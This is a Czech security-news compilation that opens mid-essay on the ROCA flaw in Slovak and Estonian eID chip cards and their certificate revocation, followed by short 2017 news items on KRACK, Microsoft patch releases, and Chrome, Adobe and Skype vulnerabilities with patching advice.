Zdůrazněme si, že zranitelnost ROCA se týká jen funkce čipové karty. A to ještě jenom tam, kde je klíčový pár (soukromý a veřejný klíč) generován přímo uvnitř čipu.

Je to důležité pro správné pochopení toho, co se nyní děje se slovenskými občanskými průkazy (eID) a také s tamními elektronickými doklady o pobytu (eDoPP): stejně jako v našem případě to jsou „dvojkombinace“, zahrnující jak „průkaz totožnosti“ (eID funkci), tak i čipovou kartu pro potřeby elektronického podpisu.

Na rozdíl od našich průkazů ale jsou ty slovenské skutečně elektronické, a to v obou svých částech, resp. funkcích. Tedy i pokud jde o funkci elektronické identifikace a autentizace, která ale není zranitelností ROCA nijak ohrožena – a svou roli „skutečně elektronického průkazu totožnosti“ tak slovenské průkazy mohou plnit i nadále a beze změny.

Zranitelností ROCA je ohrožena pouze ta část slovenských průkazů, která je fakticky čipovou kartou pro uchovávání soukromých klíčů a k nim vystavených kvalifikovaných certifikátů. Podstatným rozdílem oproti našim občanským průkazům s čipem, resp. jejich funkce čipové karty, je skutečnost, že na Slovensku tato část průkazu prošla potřebnou certifikací a je bezpečným prostředkem pro vytváření elektronických podpisů (SSCD, dnes „kvalifikovaným prostředkem“, zkratkou QSCD).

Na Slovensku totiž od začátku dodržují ducha unijní legislativy k elektronickým podpisům, která počítá s používáním bezpečných (dnes: kvalifikovaných) prostředků pro vytváření elektronických podpisů – zatímco u nás jsme se již v roce 2000 vydali cestou národních výjimek („přeci nebudeme lidi nutit kupovat si nějakou drahou čipovou kartu“) a zavedli si uznávané elektronické podpisy (které nevyžadují ony bezpečné/kvalifikované prostředky). Nicméně skutečné využití občanského průkazu jako bezpečného prostředku pro vytváření el. podpisů je i na Slovensku dobrovolné, a nikoli povinné. Čip sice mají všechny průkazy (kterých bylo vydáno již cca 2,5 milionu), ale klíče a certifikáty si na nich nechávají generovat jen ti, co o tuto možnost mají zájem (těch bylo cca 300 000, zdroj).

Paradoxně jsou ale dnes na Slovensku biti za to, že se vydali předepsanou cestou bezpečných/kvalifikovaných prostředků – a doplatili na to, že ani předepsaná certifikace bezpečných prostředků v akreditovaných laboratořích (zde konkrétně provedená v Německu) nedokázala odhalit dnes popisovanou zranitelnost. Což je docela smutné zjištění.

Jak postupovali na Slovensku a jak v Estonsku
Jak jsme si již řekli v úvodu článku, na Slovensku nakonec – po určitém počátečním váhání, nepochopení a popírání celého problému a jeho zlehčování – nakonec přistoupili k revokaci podpisových certifikátů, umístěných na čipu tamních občanských průkazů a dokladů o pobytu. Přesněji: všech tří certifikátů, které jsou zde umístěny a které byly vydány k soukromým klíčům, vygenerovaným v příslušném páru přímo na kartě a jejím čipu (s využitím chybující knihovny): jde o kvalifikovaný certifikát pro elektronický podpis (certifikát ACA, dle bodu 15 článku 3 nařízení eIDAS), dále o (ne-kvalifikovaný) certifikát pro elektronický podpis (certifikát PCA, dle bodu 14 článku 3 nařízení eIDAS) a dále o šifrovací certifikát (certifikát SCA). Podle tohoto zdroje mělo být revokováno celkem 296 037 kvalifikovaných certifikátů.

Současně na Slovensku vyzvali ty držitele, kteří nadále chtějí využívat své průkazy i pro elektronické podepisování, aby si pořídili certifikáty nové. Původní představa byla taková, že to půjde zařídit na dálku, ale nakonec to přeci jen vyžaduje osobní účast (dostavit se na „kterékoli oddělení dokladů“). Mělo by se jednat o nové certifikáty ke klíčům o velikosti 3072 bitů. U těch je ale, alespoň podle tohoto zdroje, otázkou, zda také nejsou ohroženy zranitelností ROCA.

Nicméně i toto by mělo být jen krátkodobým řešením před přechodem na řešení zásadnější. Tím by měl být (prý již v lednu 2018) přechod na podpisové schéma DSA, resp. jeho variantu s eliptickými křivkami ECDSA. Zde už se totiž s prvočísly vůbec nepracuje, a tak zde nalezená zranitelnost ROCA nehrozí. Také další vlastnosti tohoto podpisového schématu jsou příznivější (např. pro praktické nasazení vyžadují menší výpočetní kapacitu). Nevýhodou je ale to, že u nich již nejde jednoduše „obrátit“ využití soukromého a veřejného klíče a místo k podepisování je využít pro šifrování. To jde dělat jen u schématu RSA, kde se dá šifrovat veřejným klíčem a dešifrovat klíčem soukromým.

Celkově je ale možné konstatovat, že na Slovensku se „začaly dít věci“ až po první fázi zveřejnění celé zranitelnosti, tedy až ve druhé půlce října. I když (podle tohoto zdroje) se slovenská autorita Disig, vydávající certifikáty pro tamní e-občanky, o problému dozvěděla již 20. června 2017. A nedovedu si představit, že by si to nechala jen pro sebe a neinformovala o tom kompetentní orgány státu.

To Estonsko veřejně zareagovalo prakticky okamžitě poté, co bylo (30. srpna) o nalezené zranitelnosti informováno přímo jejími objeviteli – s tím, že nebezpečí nebere na lehkou váhu a dále jej zkoumá. K tomu je vhodné dodat, že v Estonsku bylo před volbami, které tam mohou probíhat i elektronicky, právě s využitím tamních elektronických občanek. O to více si Estonci nemohli dovolit problém jakkoli ignorovat či jen bagatelizovat.

Podle tohoto zdroje estonský předseda vlády, jakmile se o zranitelnosti dozvěděl, odvolal plánovanou státní návštěvu Polska a jal se věci řešit. Asi i včetně hodnocení toho, co a jak hrozí a zda nebude nutné odvolat nadcházející volby. To na Slovensku tamní ministr vnitra Kaliňák zareagoval „trochu jinak“ (výzvou, ať mu hacknou jeho e-občanku).

Jedním z prvních opatření, které v Estonsku přijali (počátkem září, a tedy jen několik málo dnů, co se o problému dozvěděli), bylo znepřístupnění (uzavření) veřejné databáze certifikátů na e-občankách. Museli tedy již znát podstatu zranitelnosti a vědět, že hrozí právě odvození soukromého klíče z klíče veřejného. Současně doporučili svým občanům, aby místo „čipových“ e-občanek raději používali mobilní eID, které nalezenou zranitelností netrpí. Informovali i své e-rezidenty, kterých se celý problém týká také.

Nakonec i v Estonsku, po zveřejnění detailů celé zranitelnosti a s pravděpodobnou brzkou dostupností různých nástrojů na reálné prolamování soukromých klíčů, přistoupili také k revokaci všech certifikátů ze svých e-občanek (viz úvod článku). Současně vyzvali jejich držitele k získání nových.

V souvislosti se zranitelností ROCA se hodně mluvilo i o Rakousku, které by mělo být také „zasaženo“. Tamní e-občanky ale již delší dobu používají podpisové schéma ECDSA (tedy to, na které na Slovensku i v Estonsku teprve chtějí přejít), a tudíž zranitelností ROCA nejsou ohroženi.

Co způsobila revokace?
Za zmínku určitě stojí i dopady hromadné revokace certifikátů, ke které došlo na Slovensku i v Estonsku – k datu 31. 10. 2017, resp. 3. 11. 2017. Jak to tedy je s platností podpisů vytvořených ještě před tímto datem?

Obecně je možné konstatovat, že platnost takovýchto podpisů ovlivněna není, protože se s časem nemění. Co se ale v čase mění a co je revokací zásadně ovlivněno, je naše schopnost ověřit a prokázat stav platnosti nějakého konkrétního podpisu.

U takových dokumentů, které byly řádně podepsány ještě před revokací podpisového certifikátu, a stejně tak byly ještě před revokací opatřeny (kvalifikovaným) časovým razítkem, se na možnosti ověřit jejich platnost nic nemění. Díky časovému razítku je totiž možné prokázat, že podpis existoval již před okamžikem přidání razítka. Zde tedy problém nevzniká, resp. možnost ověření se kvůli revokaci nemění.

Ovšem u dokumentů, které sice byly podepsány před revokací, ale ke kterým nebylo včas (rozuměj: ještě před revokací) přidáno časové razítko, už problém je. Kvůli absenci (kvalifikovaného) časového razítka totiž přicházíme o důkaz toho, že podpis existoval již před okamžikem revokace. Obvyklé metody (strojového) ověřování platnosti pak musí ověřovat platnost podpisu k aktuálnímu časovému okamžiku (tedy: už po revokaci), a už tedy nemohou podpis ověřit jako platný.

Možnost ověřit takovýto podpis bez časového razítka však stále existuje, ale už je to spíše na „ruční“ ověřování, případně až na ověřování před soudem cestou soudního znalce: musí se najít nějaký jiný důkaz (než chybějící časové razítko), který bude dosvědčovat, že daný podpis existoval ještě před revokací. A bude na „lidském“ posouzení (případně až před soudem), zda je takovýto důkaz dostatečně spolehlivý (i vzhledem k tomu, co je ve hře).

Příkladem takového důkazu o existenci podpisu v určitém čase může být třeba záznam elektronické podatelny o okamžiku přijetí podepsaného dokumentu. Nebo nějaká „digitální stopa“, případně svědecká výpověď apod.

Takže: ne, že by to nešlo (prokázat platnost podpisu i bez časového razítka). Ale může to být dosti složité, hodně nákladné a nemusí to vždy vést k očekávanému výsledku.

Berme to proto jako ponaučení a argument pro používání (kvalifikovaných) časových razítek i tam, kde to není explicitně předepsáno jako povinnost. V ČR to mají jako povinnost (z §11 zákona č. 297/2016 Sb.) všechny orgány veřejné moci, u všech elektronických dokumentů, které produkují v rámci výkonu své působnosti: musí podepisovat (nebo pečetit) a současně musí opatřovat časovými razítky. Pro právnické a fyzické osoby ale připojování časových razítek povinností není. Nicméně lze to vřele doporučit, i kvůli právě popsanému příkladu ze Slovenska a Estonska.

K tomu lze ještě dodat, že časová razítka nejsou zdarma. Nicméně i „v malém“ stojí srovnatelně či méně než tisk či kopírování jedné strany A4. A rozhodně mnohem méně, než jaké mohou být náklady na řešení případných sporů, když dojde na příslovečné lámání chleba.

Je to vůbec rozumné?
Na samotný závěr možná ještě jeden osobní postřeh a názor: podle mne není úplně ideální kombinovat v sobě (elektronický) průkaz totožnosti a čipovou kartu (bezpečný/kvalifikovaný prostředek pro vytváření elektronických podpisů).

Samozřejmě to má určité výhody, ale i řadu nevýhod, které spíše převažují. Například to, že „režim používání“ bývá odlišný: průkaz totožnosti u sebe obvykle nosíme pořád, zatímco čipovou kartu pro podepisování už pořád u sebe mít nemusíme. Spíše si ji nějak hlídáme a raději uchováváme na nějakém bezpečném místě. Nehledě již na rozdílnou „životnost“ průkazu totožnosti (klidně i 10 let) a podpisových certifikátů (dnes standardně 1 rok).

Nebo, a to se ukazuje právě nyní: když u jedné složky takovéto „dvojkombinace“ dojde k nějakému problému, veze se s ní i druhá složka. A zdaleka ne každý dokáže rozlišit, čeho se problém týká, a čeho naopak nikoli.

Wi-Fi WPA2 má kritickou chybu, všem hrozí krádeže citlivých dat

17.10.2017 SecurityWorld Zranitelnosti
Kritická zranitelnost protokolu WPA2, označovaná jako Krack (Key Reinstallation Attacks), má podle expertů potenciál degradovat zabezpečení Wi-Fi připojení prakticky pro všechna bezdrátová zařízení nebo sítě, což umožňuje útočníkům, aby špehovali internetovou komunikaci nebo dokonce injektovali škodlivý kód.

Dobrou zprávou je, že pokud používáte počítač se systémem Windows, jste již v bezpečí – tedy přinejmenším pokud použijete nové aktualizace, které Microsoft v průběhu minulého týdně potichu na Windows aplikoval.

Microsoft podle svých slov totiž vydal bezpečnostní aktualizaci 10. října a zákazníci, kteří mají povolenou službu Windows Update a používají aktualizace zabezpečení, jsou tak prý automaticky chránění.

Zranitelnost zabezpečovacího mechanizmu WPA2 včera uveřejnil Mathy Vanhoef, výzkumný pracovník Katholieke Universiteit Leuven v Belgii. Podle Vanhoefa slabiny v WPA2 umožnily zločincům číst informace přenášené po síti Wi-Fi, o které se podle protokolu myslí, že jsou zašifrovány.

"Útočníci mohou tuto techniku napadnout a následně číst informace, které byly dříve považované za bezpečně šifrované," tvrdí Vanhoef. To se podle něj může zneužít ke krádežím citlivých informací, jako jsou čísla kreditních karet, hesla, zprávy z chatu, e-maily, fotky a tak dále.

Krack se zaměřil na třetí krok ve čtyřkrokovém procesu "handshake" při ověřování. Ten se vykonává, když se klientské zařízení Wi-Fi pokouší připojit k chráněné síti Wi-Fi.

Šifrovací klíč se může během třetího kroku opakovaně přeposílat a pokud útočníci shromažďují a opakovaně opakují přenosy určitým způsobem, může být šifrování Wi-Fi kompromitované.

Macy, iPhony, telefony s Androidem, počítače se systémem Linux, směrovače a další zařízení potřebují záplaty, které je chrání před zranitelností. Naštěstí existují způsoby, jak se v mezidobí chránit – třeba formou využití VPN sítí.

„Spojení probíhající přes HTTPS jsou dodatečně šifrována a jejich obsah tedy zůstává zabezpečen. Záleží tedy na uživateli, jestli kontroluje přítomnost ´zeleného zámečku´ v adresním řádku (nicméně ne všechny webové stránky podporují HTTPS),“ tvrdí zpráva českého centra CSIRT.

Sám Vanhoef doporučuje dočasný zákaz funkce klientů na směrovačích a přístupových bodech a odpojení služby 802.11r. Pokud chcete více informací, problému se týkají následující CVE: CVE-2017-13077, 13078, 13079, 13080, 13081, 13082, 13084, 13086, 13087 a 13088.

Také podle Esetu jde o vážnou situaci, neboť zde není žádný jiný standard, kterým by bylo možné WPA2 okamžitě nahradit. Někteří výrobci hardwaru již nicméně bezpečnostní záplaty na své produkty vydali, ostatní by tak měli teprve učinit.

„Bude ještě zajímavé sledovat, kolik zařízení zůstane nakonec bez záplat,“ říká Miroslav Dvořák, technický ředitel Esetu. Podle něj uživatel může využít tzv. VPN, která vytvoří bezpečný šifrovaný tunel mezi ním a jeho či cílovou sítí. Tento ‚tunel‘ nemůže útočník napadnout, respektive nemá možnost číst probíhající komunikaci v čitelné formě.

Dalším doporučením je zkontrolovat si, zda je či bude v brzké době k dispozici bezpečnostní záplata pro jejich zařízení, která by tuto zranitelnost řešila.

„Ale pozor, některé z variant zranitelnosti se zdaleka netýkají pouze hardwaru, ale i například operačních systémů Android, Linux, Apple, Windows nebo OpenBSD,“ dodává Dvořák.

Nebezpečné chyby ohrožují uživatele Windows

18.9.2017 Novinky/Bezpečnost Zranitelnosti
Hned několik kritických chyb bylo objeveno v produktech společnosti Microsoft. Týkají se samotného operačního systému Windows, případně jeho nedílných součástí, jako je rozhraní NET Framework. Chyby mohou zneužít počítačoví piráti k napadnutí cizího počítače.
Hned na úvod je nutné zdůraznit, že americký Microsoft již pro objevené chyby vydal mimořádné bezpečnostní záplaty. Uživatelé se tedy mohou relativně snadno bránit.

Celá řada uživatelů instalaci aktualizací podceňuje, a tak se počet nezáplatovaných strojů relativně snadno může vyšplhat až na několik miliónů. Právě takové stroje – tedy ty, které nemají nainstalované aktualizace – dávají jejich majitelé všanc počítačovým pirátům.

Převezmou kontrolu nad systémem
Chyby jsou obsaženy především v operačním sytému Windows Server 2008. Ten, jak už samotný název napovídá, je určen především pro serverové stanice. Na pozoru by se nicméně měli mít také uživatelé klasických počítačů – bezpečnostní trhliny totiž obsahuje i rozhraní NET Framework. A to se běžně používá také v desktopových verzích systému od amerického počítačového gigantu, například i v nejnovějších desítkách.

Všechny chyby mají nálepku kritické. To zjednodušeně znamená, že kvůli chybě mohou počítačoví piráti propašovat do napadeného systému prakticky libovolný škodlivý kód. Snadno tak mohou klidně i převzít kontrolu nad celým počítačem.

S instalací aktualizací by tak uživatelé neměli v žádném případě otálet. K dispozici jsou prostřednictvím služby Windows Update, která je nedílnou součástí operačního systému Windows.

Lidé, kteří využívají automatické aktualizace, se nemusí o nic starat.

Microsoft vydal pravidelný balík oprav. Stále nevyřešil aplikace přepnuté do angličtiny

13.9.2017 cnews.cz Zranitelnosti
Buď jak buď, Windows Update nažhavte.

Probíhá instalace nové verze Windows 10
Probíhá instalace nové verze Windows 10 (Ilustrační foto)
Včera večer nám Microsoft naservíroval pravidelnou dávku oprav. Proběhlo totiž tzv. záplatovací úterý a své opravy chyb a záplaty pro slabá místa zabezpečení dostala řada produktů, především však Windows a Office.

Opravné balíčky formou kumulativních aktualizací míří k Desítkám, Osmičkám a Sedmičkám:

aktualizace KB4038788 pro Windows 10 v1703 zvedá číslo sestavení na 15063.608,
aktualizace KB4038782 pro Windows 10 v1607 zvedá číslo sestavení na 14393.1715,
aktualizace KB4038783 pro Windows 10 v1511 zvedá číslo sestavení na 10586.1106,
aktualizace KB4038781 pro Windows 10 v1507 zvedá číslo sestavení na 10240.17609,
aktualizace KB4038792 pro Windows 8.1 přináší všechny opravy,
aktualizace KB4038793 pro Windows 8.1 přináší jen záplaty,
aktualizace KB4038777 pro Windows 7 přináší všechny opravy,
aktualizace KB4038779 pro Windows 7 přináší jen záplaty.
Windows Update nabízí nové aktualizace
Windows Update nabízí nové aktualizace
Opravy pro Creators Update

Aktualizace pro Creators Update nabízí změny a řešení následujících problémů:

Barevný profil po hraní hry v celoobrazovkovém režimu nemusel být obnoven do původního uživatelského nastavení.
Aktualizovaná funkce HDR je nyní ve výchozím stavu vypnutá.
Po přidání IME od třetí strany se někdy neotvírala nabídka Start.
Byly vyřešeny potíže s některými skenery.
Mobile Device Manager Enterprise mohl způsobit, že mobilní zařízení nefungovalo správně.
Některé stroje po probuzení z režimu spánku nemusely najít bezdrátová zařízení.
Hlášení chyb Windows po sobě nesmazalo dočasné soubory, pokud docházelo k přesměrování složky.
Zrušení platnosti certifikátu asociovaného s neaktivním uživatelským účtem se nemuselo podařit.
V LSASS docházelo k významným paměťovým únikům.
Aktivace šifrování pomocí syskey.exe mohla znefunkčnit spouštění systému.
Skript BitLocker.psm1 pro PowerShell nyní nezaznamenává hesla, pakliže aktivujete ukládání údajů do logu.
Přidání přihlašovacích údajů s prázdným heslem do Správce pověření mohlo způsobit pád systému při použití tohoto přihlašovacího údaje.
Byl aktualizován adresní řádek v Internet Exploreru 11.
V Internet Explorer přestalo fungovat vracení se zpět, pokud byla konverze znaků zrušena pomocí IME.
Po aktivaci EMIE docházelo k neustálému přepínání mezi Edgem a Internet Explorerem.
Zařízení mohlo na několik minut zamrznout, pokud k němu byl připojen síťový adaptér pro USB.
Některé aplikace nemohly být spuštěny, protože služba IPHlpSvc přestala odpovídat v průběhu spouštění Windows.
Služba spoolsv.exe někdy přestala fungovat.
Skript Get-AuthenticodeSignature nezobrazil TimeStamperCertificate.
Po upgradu na Windows 10 bylo možné pozorovat dlouhé prodlevy při používání aplikací hostovaných na počítačích se systémem Windows Server 2008 SP2.
Docházelo k potížím se zobrazením aplikací RemoteApp, pakliže jste aplikaci minimalizovali a obnovili ji zpět do celoobrazovkového režimu.
Průzkumník souborů mohl přestat odpovídat, což mohlo dále vést k zamrznutí celého systému.
Skript Export-StartLayout selhával při exportování rozložení dlaždic při spuštění systému.
Možnost připojit se k Azure AD někdy nebyla dostupná při prvotním nastavení zařízení.
Někdy klepnutí na oznámení nevyvolalo akci, kterou by mělo iniciovat.
Byla znovu vydána bezpečnostní oprava MS16-087 týkající se tisku.
Byla opravena slabá místa zabezpečení napříč systémem.
Edge stále komunikuje anglicky

Mimochodem, Microsoft u aktualizace zaznamenává jeden známý problém. Instalace aktualizace KB4034674 mohla způsobit přepnutí Edge a některých dalších aplikací do angličtiny. K přepnutí mohlo dojít jen u dvou jazykových mutací Windows. Pokud Creators Update požíváte, víte, že jedním z nich je čeština a že problém přetrvává již řádově měsíce. (Druhým je arabština.)

Kupodivu Microsoft řešení problému stále nenabídl, takže dříve změněné jazykové nastavení zůstává ve změněném stavu, tj. v Edgi a spol. vidíte popisky v angličtině. Osobně s angličtinou problém nemám, ale neschopnost vrátit věci do původního stavu je zarážející. K chybám docházet může a bude, stěžejní je proto přístup k jejich řešení. V tomto případě si Microsoft dobrou reklamu nedělá. Doufejme, že se mu brzy podaří napravit, co sám zpackal.

Chrome má kritickou zranitelnost. Útočníci mohou převzít kontrolu nad PC

8.9.2017 Novinky/Bezpečnost Zranitelnosti
Na pozoru by se měli mít všichni uživatelé internetového prohlížeče Chrome od společnosti Google. Byla v něm totiž objevena kritická chyba, kterou mohou kyberzločinci zneužít k převzetí kontroly nad napadeným systémem.
Před nově objevenou trhlinou varoval český Národní bezpečnostní tým CSIRT.CZ. Ten zároveň upozornil i na to, že opravy pro chybu jsou již k dispozici. „Nové aktualizace pro Google Chrome opravují chyby umožňující převzetí kontroly nad systémem,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ.

Kritickou zranitelnost neobsahuje nejnovější verze tohoto internetového prohlížeče nesoucí číslo 61.0.3163.79.

Chyby se nevyhýbají ani dalším prohlížečům. V minulém měsíci byly odhaleny kritické zranitelnosti také v Internet Exploreru a Firefoxu. Přehled oprav naleznete v našem dřívějším článku.

V ohrožení bylo přes milión uživatelů. Útočníci se zaměřili na Chrome

9.8.2017 Novinky/Bezpečnost Zranitelnosti
Terčem počítačových pirátů se stal v poslední době internetový prohlížeč Chrome. Podařilo se jim totiž zotročit jedno rozšíření určené právě pro tento browser, kvůli tomu tak bylo ohroženo přes milión uživatelů. Upozornil na to český Národní bezpečnostní tým CSIRT.CZ.
„Bylo uneseno rozšíření Web Developers pro Chrome, které používá více než milión uživatelů,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Útok tedy zjednodušeně řečeno probíhal tak, že si toho ani obezřetní uživatelé nemohli všimnout. Samotní počítačoví piráti totiž vydali aktualizaci s pořadovým číslem 0.4.9, která byla automaticky distribuována na počítače uživatelů.

Zisky z reklamy
A právě v tom byl kámen úrazu, neboť kyberzločinci chování tohoto doplňku upravili. „Nová verze obsahovala mechanismus pro vkládání vlastních reklam útočníků do webových stránek navštívených uživatelem,“ podotkl Bašta.

Útočníci tak mohli kasírovat nemalé částky za zobrazování reklamy. Uživatelům se tak logicky v prohlížečích zobrazovaly i nabídky, které by jinak na daných webech neměly co dělat.

„Vývojářům se podařilo během několika hodin získat zpět vládu nad ukradeným účtem a vydat novou verzi 0.5. Na tu by měli uživatelé okamžitě přejít,“ poradil bezpečnostní expert.

Pozor na hesla
Ten zároveň upozornil, že útočníkům mohlo jít i o něco jiného než zisky z reklamy – například o krádež přihlašovacích údajů do různých on-line služeb. „Dále je doporučováno zvážit změnu hesel pro všechny webové účty a anulovat přihlašovací tokeny a cookies pro všechny webové stránky, které byly navštíveny v době používání infikovaného rozšíření,“ uzavřel Bašta.

Tento útok jasně ukazuje, jak jsou moderní počítačové systémy zranitelné. Útočníci totiž mohou škodlivý kód propašovat do počítače i v případě, kdy se uživatel chová příkladně a dbá na bezpečnostní poučky. Jednoduše zneužijí nějaký program, který je již na daném stroji nainstalovaný.

Záplatovací úterý nabídlo opravy pro Windows a další také o prázdninách

9.8.2017 CNEWS.cz Zranitelnosti
Velký servisní den pro Microsoft.

Včera večer proběhlo další záplatovací úterý. Někteří tak obdrží větší servisní aktualizaci po pouhém týdnu. Poznámky k vydání tvrdí, že se aktualizace dotýkají těchto produktů: Internet Explorer, Edge, Windows, SharePoint, Flash Player a SQL Server.

Srpnové opravné balíčky formou kumulativních aktualizací putují k Desítkám, Osmičkám a Sedmičkám:

aktualizace KB4034674 pro Windows 10 v1703 zvedá číslo sestavení na 15063.540,
aktualizace KB4034658 pro Windows 10 v1607 zvedá číslo sestavení na 14393.1593,
aktualizace KB4034660 pro Windows 10 v1511 zvedá číslo sestavení na 10586.1045,
aktualizace KB4034668 pro Windows 10 v1507 zvedá číslo sestavení na 10240.17533,
aktualizace KB4034681 pro Windows 8.1 přináší všechny opravy,
aktualizace KB4034672 pro Windows 8.1 přináší jen záplaty,
aktualizace KB4034664 pro Windows 7 přináší všechny opravy,
aktualizace KB4034679 pro Windows 7 přináší jen záplaty.
Je čas aktualizovat
Je čas aktualizovat
Běžné opravy pro poslední vydání Desítek odhalila aktualizace v minulém týdnu, jak již bylo uvedeno, tato nová navíc přidává jen pár záležitostí. Pokud jste zmíněný balíček nezískali, dostanete tyto opravy tentokrát. Připomínám, že aktualizace jsou kumulativní, tudíž obsahuj všechny dříve vydané opravy. Seznam změn pro KB4034674 vypadá následovně:

Pravidla poskytovaná službou Mobile Device Management jsou nadřazena pravidlům poskytnutým v původní sadě základní konfigurace zařízení od správce či správkyně.
Pravidlo s názvem Site to Zone Assignment List nebylo aktivní, přestože jste ho zapnuli.
Průvodce tvorbou pravidel AppLocker padal při vybírání účtů.
Byl vyřešen problém s přesměrováním do složky a blokováním profilu na neprimárním počítači.
Porušení přístupu v Mobile Device Manager Enterprise způsobovalo výskyt upozornění na chyby.
Byla opravena slabá místa v zabezpečení v Edgi, komponentě Windows Search, skriptovacím jádře, knihovně Windows PDF, Hyper-V, Windows Serveru, ovladačích běžících v jádrovém režimu, subsystému pro Linux, Windows shellu, ovladači Common Log File System, Internet Exploreru, a v jádře Microsoft JET Database.

Nebezpečné chyby mají Flash Player, Acrobat i Reader. Piráti je mohou zneužít

9.8.2017 Novinky/Bezpečnost Zranitelnosti
Hned několik desítek chyb bylo objeveno v populárních programech od společnosti Adobe. Týkají se například oblíbeného programu Flash Player, který slouží k přehrávání videí na internetu a po celém světě jej používají stovky miliónů lidí. Chyby se nevyhnuly ani programům Acrobat a Reader, které slouží k práci s PDF dokumenty. Záplaty od společnosti je však již možné stahovat.
„Společnost Adobe vydala záplaty pro produkty Flash Player, Reader, Acrobat, Digital Editions a Experience Manager, které opravují více než 80 zranitelností objevených externími výzkumníky,“ uvedl Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

Ten zároveň varoval, že objevené zranitelnosti se nemusí vyplácet podceňovat. „Seznam obsahuje zranitelnosti jako critical memory corruption, use-after-free, heap overflow a další, které mohou být zneužity ke vzdálenému spuštění kódu,“ přiblížil technickou stránku věci Bašta.

Propašují virus, zotročí počítač
To jinými slovy znamená, že prostřednictvím chyb mohou kyberzločinci propašovat na cizí počítač prakticky jakýkoli škodlivý kód, případně jej zcela ovládnout na dálku. Mohli se tak snadno dostat k uloženým datům, případně odchytávat přihlašovací údaje na různé webové služby.

Takový stroj se pak klidně i bez vědomí uživatele může stát součástí botnetu (síť zotročených počítačů), který kyberzločinci zpravidla zneužívají k rozesílání spamu nebo k DDoS útokům.

Častý terč útoků
Stahovat záplatu je možné prostřednictvím automatických aktualizací daného programu nebo prostřednictvím stránek společnosti Adobe.

Flash Player používá na celém světě několik stovek miliónů lidí. Právě kvůli velké popularitě se na Flash Player zaměřují kybernetičtí nájezdníci pravidelně. Podle analýzy bezpečnostní společnosti Record Future cílilo osm z deseti nejrozšířenějších hrozeb v roce 2015 právě na tento přehrávač videí.

To je i jeden z hlavních důvodů, proč se společnost Adobe rozhodla Flash Player sprovodit ze světa. Podle dřívějšího oznámení jej bude podporovat už jen tři roky.

Kritické chyby jsou v programech Microsoftu i Adobe. Mohou je zneužít kyberzločinci

14.7.2017 Živě.cz Zranitelnosti
Flash Player, Internet Explorer, ale například i operační systém Windows. Ve všech těchto produktech byly objeveny kritické bezpečnostní chyby. Záplaty jsou naštěstí již k dispozici, a tak by je měli uživatelé co nejdříve nainstalovat. V opačném případě se vystavují riziku útoku kyberzločinců.
Americký softwarový gigant opravil více než pět desítek zranitelností. „Opravy se týkaly například prohlížečů Edge a Internet Explorer, kancelářského balíku MS Office nebo celkově součástí operačního systému Windows,“ uvedl Pavel Bašta, analytik Národního bezpečnostního týmu CSIRT.CZ.

„Jako kritických bylo označeno 19 z nich a je proto doporučeno co nejdříve systémy aktualizovat,“ doplnil Bašta.

Zotročí počítač, nainstalují virus
Všechny chyby mají nálepku kritické, mohou je tedy snadno zneužít počítačoví piráti. Například ke spuštění libovolného kódu, na cizí stroj mohou klidně propašovat nějaký počítačový virus. A klidně jej i zotročit a zneužít k útoku typu DDoS.

Při něm mohou počítačoví piráti vyřadit některé služby, které na počítači uživatel využívá. Daleko větší riziko však představuje možnost vzdáleného spuštění programů – touto cestou totiž mohou kyberzločinci do napadeného stroje propašovat prakticky libovolný škodlivý kód.

Prakticky stejná rizika hrozí uživatelům, kteří mají v počítači nainstalovaný Flash Player. „Společnost Adobe vydala novou verzi Flash Playeru s opravami tří zranitelností, z nichž jedna byla označena jako kritická,“ konstatoval Bašta.

S instalací neotálet
Právě kritickou zranitelnost mohou počítačoví piráti také zneužít k tomu, aby propašovali na cizí stroj prakticky libovolný škodlivý kód – podobně jako u chyb v programech amerického softwarového gigantu.

S instalací všech aktualizací by tak uživatelé neměli v žádném případě otálet. K dispozici jsou prostřednictvím služby Windows Update, která je nedílnou součástí operačního systému Windows. Případně je možné novou verzi Flash Playeru stáhnout přímo ze stránek Adobe.

Lidé, kteří využívají automatické aktualizace, se nemusejí o nic starat.

Útočníci se dostanou do PC přes Skype. Využijí kritickou chybu

30.6.2017 Novinky/Bezpečnost Zranitelnosti
Český Národní bezpečnostní tým CSIRT.CZ varoval před nově objevenou zranitelností, kterou obsahuje populární komunikační program Skype. Oprava je naštěstí již k dispozici, a tak by uživatelé s její instalací neměli otálet.
„Chyba přetečení zásobníku umožňuje útočníkům vzdáleně rozbít aplikaci s neočekávanou výjimkou,“ vysvětlil technickou stránku věci Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Podle něj jsou rizika nově objevené trhliny obrovská. „Následně se dá útok využít ke spuštění škodlivého kódu, a to bez jakékoliv interakce účtu oběti,“ doplnil Bašta.

To jinými slovy znamená, že chybu mohou počítačoví piráti zneužít k tomu, aby propašovali prakticky libovolného záškodníka na cizí počítač. S jeho pomocí pak budou schopni přistupovat k uloženým datům, odposlouchávat internetovou komunikaci či počítač úplně zotročit.

Útočníci mohou chybu snadno zneužít
Trhlinu ve Skypu objevil jako první bezpečnostní analytik Benjamin Kunz Mejri, který na ni upozornil přímo tvůrce softwaru – tedy společnost Microsoft. Právě díky němu bylo možné vydat opravu ještě dříve, než ji začali zneužívat počítačoví piráti.

Tím, že jsou detaily o zranitelnosti nyní veřejně známé, mohou ji snadno zneužít počítačoví piráti. S instalací opravy, respektive novější verze Skypu, by tak uživatelé rozhodně neměli otálet.

Stáhnout nejnovější aktualizaci je možné přímo z tohoto oblíbeného komunikačního programu. Stačí kliknout na nabídku „Nápověda“, kde se následně ukrývá volba „Vyhledat aktualizace“.

Microsoft uvolnil dávku oprav pro Windows, které se někteří smí vyhnout

28.6.2017 CNEWS.cz Zranitelnosti
Na druhou stranu oprav není nikdy dost a chyb bylo tentokrát eliminováno požehnaně.

Microsoft mimo záplatovací úterý aktualizace vydával buď když si to žádala situace s ohledem na bezpečnost, běžné opravné balíčky pak dodávaly častěji nové verze Windows 10. Včera, tj. 27. června, však všechny podporované verze Desítek získaly své vlastní opravné balíčky. Vydány byly dva týdny po běžném záplatovacím úterý. Jak to? Microsoft nedávno avizoval, že bude tyto opravné balíčky vydávat v předstihu před záplatovacím úterým.

